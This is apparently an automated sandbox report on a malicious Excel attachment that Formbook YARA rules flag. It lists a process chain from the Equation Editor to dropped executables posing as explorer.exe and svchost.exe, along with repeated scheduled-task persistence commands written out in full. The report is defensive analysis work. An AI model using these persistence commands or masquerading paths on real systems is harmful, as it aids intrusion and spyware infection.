Source: C:\Windows\system\explorer.exe	Code function: 8_2_03E165BA	8_2_03E165BA
Source: C:\Windows\system\svchost.exe	Code function: 10_2_005E6DC1	10_2_005E6DC1
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB4EE4C	18_2_1EB4EE4C
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB40F3F	18_2_1EB40F3F
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EBCFDDD	18_2_1EBCFDDD
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB60D3B	18_2_1EB60D3B
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB3CD5B	18_2_1EB3CD5B
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EBE3A83	18_2_1EBE3A83
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EBDCBA4	18_2_1EBDCBA4
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EBBDBDA	18_2_1EBBDBDA
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB2FBD7	18_2_1EB2FBD7
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EBCF8EE	18_2_1EBCF8EE
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB5286D	18_2_1EB5286D
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB3C85C	18_2_1EB3C85C
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB329B2	18_2_1EB329B2
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EBD098E	18_2_1EBD098E
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB469FE	18_2_1EB469FE
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EBB5955	18_2_1EBB5955
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB34680	18_2_1EB34680
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB3E6C1	18_2_1EB3E6C1
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EBD2622	18_2_1EBD2622
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB3C7BC	18_2_1EB3C7BC
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EBB579A	18_2_1EBB579A
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB65485	18_2_1EB65485
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB41489	18_2_1EB41489
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB4C5F0	18_2_1EB4C5F0
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB3351F	18_2_1EB3351F
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB2E2E9	18_2_1EB2E2E9
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EBD1238	18_2_1EBD1238
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB563DB	18_2_1EB563DB
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB2F3CF	18_2_1EB2F3CF
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB32305	18_2_1EB32305
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB7A37B	18_2_1EB7A37B
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB37353	18_2_1EB37353
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB2E0C6	18_2_1EB2E0C6
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB4905A	18_2_1EB4905A
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB33040	18_2_1EB33040

Source: Required Order Quantity.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Users\Public\vbc.exe	Code function: String function: 1EB73F92 appears 99 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 1EB7373B appears 237 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 1EB2E2A8 appears 34 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 1EB2DF5C appears 100 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 1EB9F970 appears 77 times

Source: vbc.exe .4.dr

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\system\svchost.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\system\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\system\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\system\svchost.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\system\svchost.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Windows\system\svchost.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\system\svchost.exe	Section loaded: browcli.dll	Jump to behavior

Source: 00000012.00000002.2232316725.0000000000050000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.2232316725.0000000000050000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.2234254446.0000000000A20000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.2234254446.0000000000A20000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: vbc.exe , 00000005.00000002.2197641797.00000000031C0000.00000002.00000001.sdmp	Binary or memory string: .VBPud<_
Source: vbc.exe, icsys.icn.exe, 00000007.00000000.2177137103.0000000000401000.00000020.00020000.sdmp, explorer.exe, 00000008.00000002.2236234855.0000000000401000.00000020.00020000.sdmp, spoolsv.exe, 00000009.00000002.2183386530.0000000000401000.00000020.00020000.sdmp	Binary or memory string: B*\AD:\Code\Explorer\Explorer.vbp
Source: explorer.exe, 00000008.00000002.2236452460.000000000042C000.00000004.00020000.sdmp	Binary or memory string: `P@*\AD:\Code\Explorer\Explorer.vbp
Source: vbc.exe, 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp, icsys.icn.exe, 00000007.00000002.2183922117.000000000042C000.00000004.00020000.sdmp, spoolsv.exe, 00000009.00000002.2183447253.000000000042C000.00000004.00020000.sdmp	Binary or memory string: r`P@*\AD:\Code\Explorer\Explorer.vbp

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSX@170/31@12/5

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Required Order Quantity.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREAAC.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................3;.....(.P.....................d.......y.......................................................................
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .1.....................'.....B.......................
Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................3......(.P.....<.......t.......................................0...W.O.........................................
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .1.......0...................B.......................
Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................3:.....(.P.....0.......................L.................................................................$.....
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .1...................x.......B.................$.....
Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................3E.....(.P.....8.........................................................................................0.....
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .1.....................+.....B.................0.....
Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................33.....(.P.....................................................0...W.O.........................................
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .1.......0...................B.......................
Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................38.....(.P.....................$...............................0...W.O.........................................
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .1.......0...........H.......B.......................
Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................3).....(.P.....................................................0...W.O.........................................
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .1.......0...................B.......................
Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................3......(.P.............................1.......................0...W.O.........................................
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .1.......0.............).....B.......................
Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................3-.....(.P.............4...............".......................0...W.O.........................................
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .1.......0...................B.......................
Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................3>.....(.P.............\...............1.......................0...W.O...................................,.....
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .1.......0...........(.......B.................,.....
Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................3%.....(.P.....................................................................................................
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .1...........................B.......................
Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................3-.....(.P.............P.......................................0...W.O.........................................
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .1.......0...........(.......B.......................
Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................3>.....(.P.....................................................0...W.O...................................,.....
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .2.......0...........H.......B.................,.....

Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process created: C:\Windows\system\explorer.exe
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process created: C:\Windows\system\explorer.exe			Jump to behavior

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\system\explorer.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\system\svchost.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\system\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\system\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Required Order Quantity.xlsx

ReversingLabs: Detection: 22%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe c:\users\public\vbc.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\icsys.icn.exe C:\Users\user\AppData\Local\icsys.icn.exe
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process created: C:\Windows\system\explorer.exe c:\windows\system\explorer.exe
Source: C:\Windows\system\explorer.exe	Process created: C:\Windows\system\spoolsv.exe c:\windows\system\spoolsv.exe SE
Source: C:\Windows\system\spoolsv.exe	Process created: C:\Windows\system\svchost.exe c:\windows\system\svchost.exe
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\system\spoolsv.exe c:\windows\system\spoolsv.exe PR
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:50 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:51 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {101D7849-1F13-4446-86DC-A878F583ACDC} S-1-5-18:NT AUTHORITY\System:Service:
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:53 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe c:\users\public\vbc.exe
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:55 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:57 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:59 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:03 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:05 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:07 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:13 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe c:\users\public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\icsys.icn.exe C:\Users\user\AppData\Local\icsys.icn.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe c:\users\public\vbc.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process created: C:\Windows\system\explorer.exe c:\windows\system\explorer.exe	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process created: C:\Windows\system\spoolsv.exe c:\windows\system\spoolsv.exe SE	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process created: C:\Windows\system\svchost.exe c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\system\spoolsv.exe c:\windows\system\spoolsv.exe PR	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:50 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:51 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:53 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:55 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:57 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:59 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:03 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:05 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:07 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:13 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
